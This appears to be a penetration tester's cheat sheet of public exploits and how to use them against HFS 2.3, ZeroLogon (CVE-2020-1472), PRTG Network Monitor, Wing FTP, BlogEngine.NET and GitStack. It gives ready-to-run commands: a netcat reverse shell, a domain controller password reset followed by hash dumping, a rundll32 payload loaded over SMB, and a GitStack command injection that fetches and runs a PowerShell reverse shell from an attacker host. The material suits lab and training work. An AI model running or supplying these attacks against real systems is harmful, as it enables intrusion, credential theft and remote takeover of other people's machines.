Public Exploits

CVE-2019-1388: Windows Privilege Escalation Through UAC

Rejetto HTTP File Server RCE [HFS 2.3]

Exploit: https://www.exploit-db.com/exploits/39161

  • Host /usr/share/windows-resources/binaries/nc.exe on the attacker's web server and set up a listener.

  • Modify hfsexploit.py with the attacker's IP and the reverse-shell listening port.

  • Run the exploit: python hfsexploit.py <target-IP> <target-port>

Zero Logon [CVE-2020-1472]

Write-up: https://dirkjanm.io/a-different-way-of-abusing-zerologon/

Exploit: https://github.com/dirkjanm/CVE-2020-1472

#Check for vulnerability
https://github.com/SecuraBV/CVE-2020-1472


#Exploit: Reset Password of DC$ Machine Account to Blank NTLM Hash
python3 cve-2020-1472-exploit.py <HYDRA-DC> <DC-IP>

#Dump hashes [31d6c.. is a blank hash]
secretsdump.py -hashes :31d6cfe0d16ae931b73c59d7e0c089c0 '<Domain>/<DC-Name$>@<IP>'

If secretsdump.py fails, install impacket from source in a virtualenv:

python3 -m pip install virtualenv
python3 -m virtualenv impkt
source impkt/bin/activate
pip install git+https://github.com/SecureAuthCorp/impacket

PRTG Network Monitor [<18.2.39]

Automated Exploit

Link: https://raw.githubusercontent.com/M4LV0/PRTG-Network-Monitor-RCE/master/prtg-exploit.sh

Adds a user to the Administrators group with the credentials pentest::P3nT3st

  • Log in to the app, grab your session cookie and pass it to the script: ./exploit.sh -u <Target> -c "<Cookie-value>"

Modify for Reverse Shell

  • Use Metasploit's smb_delivery module to serve the payload over port 445.

  • In exploit.sh, search for pentest to locate the payload.

  • Replace the payload (URL-encode it):

    • rundll32.exe \\10.10.0.172\pbMaor\memorycache.dll,0

    • Encoded: rundll32.exe%20%5C%5C10.10.0.172%5CpbMaor%5Cmemorycache.dll%2C0%0A

Manual Exploit

  • Testing for code execution:

    • Setup -> Account Settings -> Notifications

    • Parameter: Test; ping -n 1 <IP>

    • On Kali Machine: sudo tcpdump -i tun0 ip proto \\icmp -vv

  • Use PowerShell one-liners to gain a foothold.

Wing FTP Authenticated RCE

  • Testing for code execution:

    • sudo tcpdump -i tun0 ip proto \\icmp -vv

    • os.execute('cmd.exe /c ping -n 1 <IP>')

  • Try with Metasploit:

    • use multi/script/web_delivery

    • set target 3

BlogEngine.NET

  • RCE, affected versions: <3.3.6.0

  • CVE-2019-6714

Exploit write-up: https://blog.gdssecurity.com/labs/2019/3/28/remote-code-execution-in-blogenginenet.html

PHPMyAdmin

GitStack RCE

  • Identify Repository: GET /rest/repository/

  • Identify Users: GET /rest/user/

  • Code execution via the password parameter: use Burp to intercept the Basic Auth request:

#Payload:- <User-name>:C && cmd /c powershell.exe -ep bypass -c "IEX(New-Object Net.WebClient).DownloadString('http://<IP>/Invoke-PowerShellTcp.ps1')"

GET /web/index.php?p=<Repository name>.git&a=summary HTTP/1.1
Host: 172.31.1.12
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
Authorization: Basic <Base64-Encoded Payload>
Connection: close
